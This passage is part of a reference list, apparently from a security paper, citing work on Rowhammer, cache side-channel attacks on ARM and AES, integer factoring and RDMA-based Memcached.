[105] VUSec group, “https://github.com/vusec/drammer,” [Online]. [Accessed on 3 Nov 2016].

[106] T. Dullien, “3 things that Rowhammer taught me and their implications for future security research”.

[107] N. Zhang, K. Sun, D. Shands, W. Lou and Y. Hou, “TruSpy: Cache Side-Channel Information Leakage from the Secure World on ARM Devices,” in Cryptology ePrint Archive Report 2016/980, 2016.

[108] D. A. Osvik, A. Shamir and E. Tromer, “Cache attacks and countermeasures: the case of AES,” in Topics in Cryptology - CT-RSA, Springer, 2006.

[109] C. Percival, “Cache missing for fun and profit,” in Proceedings of BSDCan, 2005.

[110] D. Gullasch, E. Bangerter and S. Krenn, “Cache games - Bringing Access-Based Cache Attacks,” in DIMVA´16, 2016.


[111] Y. Yarom and K. Falkner, “FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack,” in USENIX Security´14, 2014.

[112] X. Zhang, “Return-oriented flush-reload side channels on ARM and their implications for Android security,” in 2016 ACM SIGSAC Conference on Computer and Communications Security (CCS'16), Vienna, Austria, October 2016.

[113] H. W. Lenstra, “Factoring integers with elliptic curves,” Annals of Mathematics, 1987.

[114] J. Jose, H. Subramoni, M. Luo, M. Zhang, J. Huang, M. Wasi-ur-Rahman, N. S. Islam, X. Ouyang, H. Wang, S. Sur and D. K. Panda, “Memcached Design on High Performance RDMA Capable Interconnects,” in International Conference on Parallel Processing, 2011.
